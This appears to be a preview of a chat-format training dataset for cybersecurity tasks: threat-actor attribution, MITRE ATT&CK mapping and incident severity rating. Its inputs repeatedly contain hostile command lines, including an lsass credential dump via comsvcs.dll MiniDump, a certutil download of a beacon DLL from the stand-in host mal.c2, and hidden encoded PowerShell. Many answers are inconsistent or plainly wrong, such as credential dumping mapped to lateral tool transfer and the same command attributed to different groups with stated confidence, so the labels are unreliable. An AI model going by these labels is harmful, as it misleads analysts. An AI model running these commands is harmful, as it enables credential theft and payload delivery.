messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 967 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3474 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 589 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: Search Engines, breach dumps, code repositories, ).", "role": "user" }, { "content": "{\"ta...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3237 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.187.88.21", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1570\"]}"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-BJ7DSIY6EC)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Reconnaissance, Defense Evasion", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-SEYROU6E9F)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Defense Evasion, Initial Access", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: KEYS Deletes the file named by tempPath + “ky” file so as not to upload anything", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "as...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2144 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: lists the running processes", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3337 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.94.247.9", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0011\"], \"techniques\": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.0.209.146", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"tec...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.163.120.200", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0007\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-T2GRSUY6PU)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Privilege Escalation, Collection", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang P...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-48JACQJTQF)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Discovery", "role": "user" }, { "content": "{\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2243 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.123.83.117", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0002\", \"TA0004\"], \"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1962 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.72.123.121", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-N96UQMPLV4)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access, Defense Evasion", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-9CZ6KL9RZV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"High\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.1.97.208", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0010\"], \"techniques...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-588NVQGCK6)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Command and Control", "role": "user" }, { "conte...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-P45M9BQM6Y)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"Extreme\", \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.31.127.129", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0008\"], \"techn...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.42.177.156", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"tech...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2141 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"conf...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Meteor can disconnect all network adapters on a compromised host using powershell -Command \"Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }\" > NUL.", "role": "user" }, { "content"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-FL8F4TV1F5)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.56.231.22", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0003\", \"TA0001\"], \"techni...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-CAB94RRY4R)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2095 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.119.119.47", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0003\", \"TA0006\"], \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-QNVBWOC9LT)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Collection, Lateral Movement, Exfiltration", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-JUIC3X42NY)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Collection, Defense Evasion", "role": "user" }, { "con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-EKDMC6QLZQ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact, Persistence, Command and Control", "role": "user" }, { "content...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Figure 11 Embedded BMP file containing encrypted string data RC4 is used to decrypt this data using a 16-byte key that is stored within the BMP file at offset 0x502", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-O8RR1B3B05)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact, Command and Control", "role": "user" }, { "content": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-8VI50W4VKS)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection, Exfiltration", "role": "user" }, { "content":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Turla has used VBS scripts throughout its operations.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-CFIGAQN7MG)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity.", "role": "user" }, { "cont...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-8MAJZ4HD55)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-HO2XDBPGSB)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution, Command and Control, Collection", "role": "user" }, {...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3126 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.127.10.206", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0007\", \"TA0002\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-2PFC25WIM2)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3629 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.171.132.200", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T10...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2740 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"conf...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 827 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.31.212.254", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0002\"], \"techniques...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.190.137.247", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1546.003\"]}", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Lazarus Group has performed brute force attacks against administrator accounts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: LoudMiner has monitored CPU usage.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-INZYQT2WZ8)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence, Defense Evasion", "role": "user" }, { "c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Remsec schedules the execution one of its modules by creating a new scheduler task.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-34HGDBD9BV)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Lateral Movement", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.137.86.175", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0005\", \"TA0002\"]...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1367 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.166.2.95", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1566.0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-Y23BCIRIXS)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion, Execution, Reconnaissance", "role": "user" }, { "c...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.70.189.158", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA000...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Remcos has a command for keylogging.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.104.221.34", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA004...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.180.155.48", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1757 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.25.91.133", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-IRQDNFPXMN)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence, Execution, Lateral Movement", "role": "user" }, { "conte...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: IcedID has the ability to identify Workgroup membership.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Cyclops Blink has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3366 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3500 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.101.42.110", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2335 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3581 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.170.26.99", "role": "user" }, { "content": "{\"tactics\": [\"TA0009...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-O6IJ0PN3BF)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Lateral Movement, Persistence", "role": "user" }, { "content": "{\"se...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3289 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.92.108.136", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0002\", \"TA0003\"], \"t...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.53.73.118", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RDFSNIFFER has used several Win32 API functions to interact with the victim machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-064TS8QG6M)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Command and Control", "role": "user" }, { "con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 532 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confi...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.172.219.166", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.191.146.168", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0043\", \"TA0001\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-5FVCLTW46I)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"sever...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3797 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.158.107.160", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0040\"], \"techniques\": [\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-1NKGTMN68F)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Persistence", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-3ATP8E4Y71)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\", \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The crontab file contains the schedule of cron entries to be run and the specified times for execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"High\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: All subsequent interaction with the C2 server uses the same SOAP web service, so we will not show all of the generated HTTP requests", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniq...